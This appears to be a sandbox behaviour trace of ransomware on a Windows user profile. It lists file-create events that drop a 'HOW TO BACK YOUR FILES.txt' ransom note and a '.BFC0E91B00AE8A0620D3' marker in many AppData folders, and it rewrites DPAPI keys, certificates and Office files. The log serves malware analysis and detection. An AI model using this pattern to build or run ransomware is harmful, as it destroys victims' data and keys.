Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
